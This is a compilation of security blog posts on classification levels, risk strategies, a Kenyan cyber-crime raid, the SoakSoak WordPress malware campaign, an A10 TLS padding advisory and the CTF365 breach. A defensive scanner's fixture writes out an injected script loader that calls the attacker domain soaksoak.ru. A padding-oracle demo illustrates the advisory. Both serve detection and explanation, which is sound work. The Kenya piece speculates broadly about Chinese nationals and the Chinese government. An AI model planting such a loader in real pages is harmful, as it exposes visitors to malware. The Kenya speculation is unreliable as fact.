The U.S. Military Classification Scheme
The U.S. military uses a five-level data classification scheme. The three classified levels (Confidential, Secret and Top Secret) are defined in Executive Order 12958; the two unclassified levels below them complete the scheme. This post lists the five levels and briefly describes each.
The five levels, from least to most sensitive, are Unclassified, Sensitive But Unclassified, Confidential, Secret and Top Secret:
- Unclassified – information that may be publicly released
- Sensitive But Unclassified – unclassified information that should not be publicly released because it may adversely affect national interests, the conduct of DoD programs, or the privacy of DoD personnel
- Confidential – information that could reasonably be expected to cause damage to national security if disclosed to unauthorized personnel
- Secret – information that could reasonably be expected to cause serious damage to national security if disclosed to unauthorized personnel
- Top Secret – information that could reasonably be expected to cause exceptionally grave damage to national security if disclosed to unauthorized personnel
The Four Basic Strategies to Controlling Risks
Information security risk management in a technology environment involves identifying, analyzing and assessing risks, and then controlling, avoiding, minimizing or eliminating the ones that are unacceptable.
For each identified risk, an organization chooses from four basic control strategies: risk avoidance, risk transference, risk mitigation and risk acceptance. The four strategies are explained below.
Risk avoidance is applying safeguards that eliminate or reduce the remaining uncontrolled risk for a vulnerability. It can be achieved through training and education, through policy, and through technical security controls and safeguards. Avoidance identifies as many threats and vulnerabilities as possible and implements countermeasures for them, reducing both the likelihood and the impact of an attack.
Risk transference is shifting the risk to other areas or to outside entities; the goal is to have someone else accept the risk. When looking for ways to transfer risk, evaluate services that can be outsourced, such as application hosting and IT operations. An outside organization may be able to offer expertise in an area that your organization simply cannot staff, and hiring that organization transfers the risk for that work to them. A contract transfers financial and operational responsibility, not accountability to your own customers or regulators, so the outsourcer's security practices still need to be assessed.
Risk mitigation is reducing the impact should the vulnerability be exploited. Mitigation assumes that it is not a matter of if something happens but when, and that when it does, policies and procedures are in place to limit the damage. These strategies include incident response plans, disaster recovery plans and business continuity plans.
Risk acceptance is understanding the consequences and accepting the risk without further controls or mitigation. There will always be risk; it cannot be eliminated entirely, so the decision to accept must rest on analysis. This means determining the level of risk to the information, evaluating the probability of an attack and the likelihood that the vulnerability would be successfully exploited, reviewing the controls already in place, and documenting a strong justification for accepting what remains (for example, that the cost of an additional control exceeds the value of the asset it would protect).
Dozens of Chinese Held in Kenya ‘Cyber Bust’
At the beginning of the month, the Kenyan police found 77 Chinese nationals operating what they described as a cyber crime network and command center in the country’s capital, Nairobi. According to police reports, the equipment recovered from the premises consisted of sophisticated, high-end telecommunications gear capable of infiltrating bank accounts, ATMs and Kenya’s M-Pesa system. M-Pesa is a mobile money transfer system that millions of Kenyans use daily to move billions in funds. Another group of the suspects operated an illegal radio station in the country, and police also recovered microchips for ATM cards in the house. Interestingly, the discovery was accidental: police had visited the upmarket estate to investigate a fire in which one of the Chinese nationals died. Given the current speculation about the suspects’ motives and the capabilities of their equipment, there is a real possibility they could have disrupted the country’s telecommunications systems and banking industry, affecting millions of people.
In the recent past, the United States has accused China of waging cyber attacks on American organizations. In particular, some experts have claimed that the Chinese government routinely employs a “vast army of hackers” to carry out cyber crimes. Beijing consistently rejects such accusations, citing its commitment to fighting cyber crime and espionage. In October, the Federal Bureau of Investigation reported that China is the leading country seeking to steal secrets from American companies. The Kenyan discovery therefore raises questions about the role of the Chinese government in the smuggling of high-end telecommunications equipment into Kenya, as well as in the establishment of a mysterious command center and illegal radio station in the country. Even though the Kenyan authorities referred to the discovery as a breakthrough in fighting cyber crime, the incident highlights lapses in Kenya’s security as well as the potentially adverse effects of technology in developing countries.
With respect to the microchips discovered during the raid, it is possible that the suspects and their employers were targeting bank accounts and the M-Pesa system to rob Kenyan citizens of their hard-earned cash. The technology was high-end, which raises the possibility of the same people attacking systems in neighboring countries such as South Sudan, Tanzania and Uganda. Cyber crime of this kind involves setting up copycat websites to trick online users into sending money to the criminals’ bank accounts, and identity theft: acquiring people’s personal information and using it to access bank accounts and other valuable services. A few months ago, commercial banks in Kenya replaced their old, easily compromised ATM cards with cards that use chip-and-PIN technology. The discovery of microchips in the raided house therefore raises two pertinent questions. Were the suspects targeting the newly introduced chip-and-PIN cards? And were the old cards targeted and compromised without the authorities yet realizing it? In my view, Kenyan commercial banks, as well as banks in the neighboring countries, should review the security of the new cards, since there is a possibility that the equipment recovered from the suspects could still penetrate the protections built into them.
By operating an illegal radio station, the suspects broke Kenya’s communications law: they would have needed a license and frequency allocation from the Communications Authority before operating a private broadcasting service. The incident follows an episode in which a Chinese company, StarTimes, hijacked frequencies of the Kenya Broadcasting Corporation (KBC) to broadcast live matches during the last World Cup tournament. Such practices can cause confusion in the country’s telecommunications system and halt every activity that depends on it. Operating an illegal radio station and hijacking the systems of the state broadcaster demonstrate the degree to which the technology available to these actors outstrips that of many African countries. These countries should take proper measures to prevent future technology-related attacks on their telecommunications systems.
The potential effects of the illegal telecommunications equipment found in Kenya are serious, so the Chinese government should cooperate fully with the Kenyan investigators to establish its citizens’ intentions. If Beijing wants to show the world that it is committed to cracking down on cyber crime committed by its nationals, it must demonstrate that it played no role in the incident and ensure that the law takes its course and all suspects are prosecuted accordingly.
Despite the many bilateral agreements the Chinese government has signed with African countries, those countries need to remain wary of the potential threats. Many Chinese nationals have taken advantage of these relations to move into different countries, and with the opportunities existing in countries like Kenya, combined with security lapses, unscrupulous actors can cause serious harm with sophisticated technology. Countries such as Kenya should review how well equipped they are to deal with crimes perpetrated through technological devices. Otherwise, they are likely to suffer massive cyber crime incidents, interruption of communications and attacks on highly sensitive infrastructure such as power plants.
100,000+ WordPress Sites Compromised by SoakSoak
Google has blacklisted over 11,000 domains with this latest malware campaign from SoakSoak.ru.
This morning a massive malware campaign was launched against WordPress websites. The campaign has been tagged SoakSoak after the domain (soaksoak.ru) that infected sites redirect their visitors to.
Details on this payload can be found on the Sucuri.net Blog.
There are various threads and forums discussing this and it is very easy to get misleading information. Here are a few things to understand:
- This email does not mean you are infected; it serves as a public service announcement.
- All Sucuri systems have been updated to better detect this infection. If you get a notification, please log into your account and submit a Malware Removal Request.
- If you are behind the Website Firewall (CloudProxy) you are being protected from what appears to be the attack vector.
- The attack appears to be correlated with the RevSlider vulnerability.
Sucuri is actively investigating with its partners to better understand the access vector. As information becomes available they will disclose it.
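The first thing a site owner wants after a campaign like this is a quick way to find the indicator in their own document root. The scanner below is an added example written for this post, not Sucuri's tooling and not code from the SoakSoak write-up. The only indicator it uses is the redirect domain named above (soaksoak.ru); the file names, the "injected" JavaScript line and the extension filter are constructed for illustration.

```python
"""Added example: scan a WordPress document root for the SoakSoak indicator.

Not Sucuri's code. The only indicator is the redirect domain named in the
post (soaksoak.ru); the sample files built in demo() are constructed here.
"""
import os
import re
import tempfile

# Indicators of compromise as byte regexes; extend from a vendor write-up as needed.
INDICATORS = {
    "soaksoak-domain": re.compile(rb"soaksoak\.ru", re.IGNORECASE),
}

# Only code that the web server will execute or serve is scanned (assumption).
SCAN_EXT = {".php", ".js", ".html", ".htm"}


def scan_file(path, indicators=INDICATORS):
    """Return (line_number, indicator_name, snippet) for every matching line."""
    hits = []
    with open(path, "rb") as fh:
        for lineno, line in enumerate(fh, 1):
            for name, pattern in indicators.items():
                if pattern.search(line):
                    snippet = line.strip()[:80].decode("utf-8", "replace")
                    hits.append((lineno, name, snippet))
    return hits


def scan_tree(root, indicators=INDICATORS):
    """Walk root and return sorted (relative path, line, indicator, snippet) tuples."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            if os.path.splitext(fname)[1].lower() not in SCAN_EXT:
                continue
            full = os.path.join(dirpath, fname)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            for lineno, name, snippet in scan_file(full, indicators):
                findings.append((rel, lineno, name, snippet))
    return sorted(findings)


def demo():
    """Build a constructed sample tree under a temp dir and return scan_tree()'s result."""
    root = tempfile.mkdtemp(prefix="wp-")
    # Constructed samples: a clean core file, a text file that is not scanned,
    # and one JavaScript file carrying an injected loader for the indicator domain.
    samples = {
        "wp-includes/template-loader.php":
            b"<?php\n// clean core file (constructed)\ndo_action('template_redirect');\n",
        "wp-content/uploads/notes.txt":
            b"soaksoak.ru in a .txt file is outside the scan scope\n",
        "wp-includes/js/swfobject.js": (
            b"/* constructed stand-in for a core JS file */\n"
            b"var swfobject = function () {};\n"
            b"document.write('<script src=\"http://soaksoak.ru/example.js\"></script>');\n"
        ),
    }
    for rel, body in samples.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "wb") as fh:
            fh.write(body)
    return scan_tree(root)


if __name__ == "__main__":
    for rel, lineno, name, snippet in demo():
        print(f"{rel}:{lineno} [{name}] {snippet}")
```

Run it against a real install with `scan_tree("/var/www/html")`. A string match only finds the one domain named here; it does not tell you how the attacker got in, and a site running an unpatched RevSlider should be assumed re-infectable until the plugin is updated and the files are restored from a known-good copy.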
SECURITY ADVISORY – A10 Networks – #CVE-2014-8730
SECURITY ADVISORY
#CVE-2014-8730 published on December 8th, 2014
Summary Description:
Early in November, A10 Networks was notified of an issue in its implementation of TLS that allows a padding oracle attack to be executed against it. The protocol implementation does not check the content of the CBC padding bytes as RFC 5246 requires (every padding byte must equal the padding_length value). This effectively reintroduces the weakness of SSLv3, where the padding bytes are not defined by the protocol specification and are therefore never checked, which is what exposed CBC cipher suites in SSLv3 to the POODLE attack.
The vulnerability is assigned CVE-2014-8730 (http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8730).
In general, this bug can be exploited remotely, allowing an attacker to decrypt sensitive data in the TLS connection. At this point there is no workaround; it is necessary to apply the patches listed below.
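To make the RFC 5246 requirement concrete, the block below is an added example written for this advisory, not A10's code and not a reproduction against any A10 product. It implements CBC mode over a toy Feistel block cipher (a stand-in for AES so the mechanics stay visible), pads a record the TLS way, and compares a strict RFC 5246 padding check with a lax SSLv3-style check that only validates the length byte. The key, IV and message are constants chosen for illustration; the MAC check and timing aspects of a real padding oracle attack are left out.

```python
"""Added example: RFC 5246 padding check versus a lax SSLv3-style check.
Not A10's code. The block cipher is an 8-round Feistel toy built on SHA-256,
standing in for AES; KEY, IV and MSG are constants chosen for illustration.
"""
import hashlib

BLOCK = 16
KEY = b"0123456789abcdef"   # illustrative key
IV = bytes(range(BLOCK))    # illustrative IV
MSG = b"attack at dawn!!"   # one full block, so the padding fills a whole block


def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def _round(key, half, rnd):
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:8]


def block_encrypt(key, block):
    """Toy 16-byte Feistel block cipher (stand-in for AES; not for real use)."""
    l, r = block[:8], block[8:]
    for rnd in range(8):
        l, r = r, _xor(l, _round(key, r, rnd))
    return r + l


def block_decrypt(key, block):
    r, l = block[:8], block[8:]
    for rnd in reversed(range(8)):
        l, r = _xor(r, _round(key, l, rnd)), l
    return l + r


def cbc_encrypt(key, iv, data):
    out, prev = b"", iv
    for i in range(0, len(data), BLOCK):
        prev = block_encrypt(key, _xor(data[i:i + BLOCK], prev))
        out += prev
    return out


def cbc_decrypt(key, iv, data):
    out, prev = b"", iv
    for i in range(0, len(data), BLOCK):
        out += _xor(block_decrypt(key, data[i:i + BLOCK]), prev)
        prev = data[i:i + BLOCK]
    return out


def tls_pad(data):
    """TLS padding: a padding_length byte preceded by that many copies of itself."""
    n = (BLOCK - (len(data) + 1) % BLOCK) % BLOCK
    return data + bytes([n]) * (n + 1)


def padding_ok_rfc5246(data):
    """RFC 5246 section 6.2.3.2: every padding byte must equal padding_length."""
    if not data:
        return False
    n = data[-1]
    return n + 1 <= len(data) and all(b == n for b in data[-(n + 1):])


def padding_ok_lax(data):
    """SSLv3-style check: only the length byte is validated; padding bytes are ignored."""
    if not data:
        return False
    n = data[-1]
    return n < BLOCK and n + 1 <= len(data)


def corrupted_padding_results():
    """Flip one bit inside the padding (not the length byte) and ask both checks.
    Returns (strict_accepts, lax_accepts); the difference is the observable oracle."""
    ct = bytearray(cbc_encrypt(KEY, IV, tls_pad(MSG)))
    ct[BLOCK - 2] ^= 0x01   # C1[14] feeds P2[14] through CBC, turning 0x0f into 0x0e
    pt = cbc_decrypt(KEY, IV, bytes(ct))
    return padding_ok_rfc5246(pt), padding_ok_lax(pt)


def accepted_counts():
    """Drive the padding_length byte through all 256 values by tampering C1[15].
    Returns (strict, lax): how many of the 256 tampered records each check accepts."""
    ct = cbc_encrypt(KEY, IV, tls_pad(MSG))
    strict = lax = 0
    for x in range(256):
        pt = cbc_decrypt(KEY, IV, ct[:BLOCK - 1] + bytes([x]) + ct[BLOCK:])
        strict += padding_ok_rfc5246(pt)
        lax += padding_ok_lax(pt)
    return strict, lax


if __name__ == "__main__":
    print("bit flip inside padding (strict, lax):", corrupted_padding_results())
    print("accepted out of 256 (strict, lax):", accepted_counts())
```

The strict check accepts only the two consistent paddings (length 0, or the original length 15 with all fifteen bytes equal), while the lax check accepts any of sixteen length values regardless of what the other padding bytes hold. That accept/reject difference, observable per record, is what a padding oracle attack turns into plaintext recovery; the fix on the server side is to enforce the RFC 5246 check, which for A10 devices means the releases listed below.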
Vulnerability Assessment:
Affected Platforms: ADC
Affected Software Versions: 2.6.1-GR1, 2.7.x
Mitigation Recommendations
A10 Networks recommends upgrading to the latest available patch release:
Technology   Major Release   Fixed               Latest Patch
ADC          2.6.1-GR1       2.6.1-GR1-P13-SP3   2.6.1-GR1-P13
ADC          2.7.0-P6        2.7.0-P6-SP4        2.7.0-P6
ADC          2.7.1-P5        2.7.1-P5-SP10       2.7.1-P5
ADC          2.7.2-P3        2.7.2-P3-SP5        2.7.2-P3
Software Updates:
Patches are available from the A10 support downloads page, in the same section as the patches for the CVE-2014-3566 (POODLE, SSLv3) vulnerability:
http://www.a10networks.com/support-axseries/downloads/downloads.php#CVE-2014-3566
CTF365.com Website Hacked and User Information dumped on Pastebin
Yesterday I received the strange email displayed below. The subject line read “You’ve been compromised by cyberselfie”, and the body stated:
“The security of a pentesting lab… a fucking joke…and they expect people to pay for such a crappy platform where the security is shit!!!
http://pastebin.com/c5a4bb1z
http://www.zone-h.org/mirror/id/23304152
http://www.zone-h.org/mirror/id/23304154”
I knew I had created an account on CTF365.com a while ago. I had heard some really good things about the site at a security conference, so my interest was piqued and I immediately went over to their site. When I got there, to my surprise I was greeted with the following page.
So what is CTF365.com?
CTF365 is a “Security Training Platform for the IT industry with a focus on Security Professionals, System Administrators and Web Developers”. The platform implements CTF (Capture The Flag) concepts and leverages gamification mechanics to improve retention and speed up the learning curve.
As of this morning the site is still not functional, but we hope they can recover soon. The site provided a great platform for individuals interested in learning about information security defense and attack in a fun manner. I have reached out to the CTF365.com staff for more information. Below are some of their recent tweets about the breach.
So far only usernames and email addresses were exposed. Investigation continues. #CTF365
— CTF365 (@CTF365) November 25, 2014
We’ll keep updates here, on FB and G+ @securityorb. Investigation continues.
— CTF365 (@CTF365) November 25, 2014
As we discover more information we will share it with you all.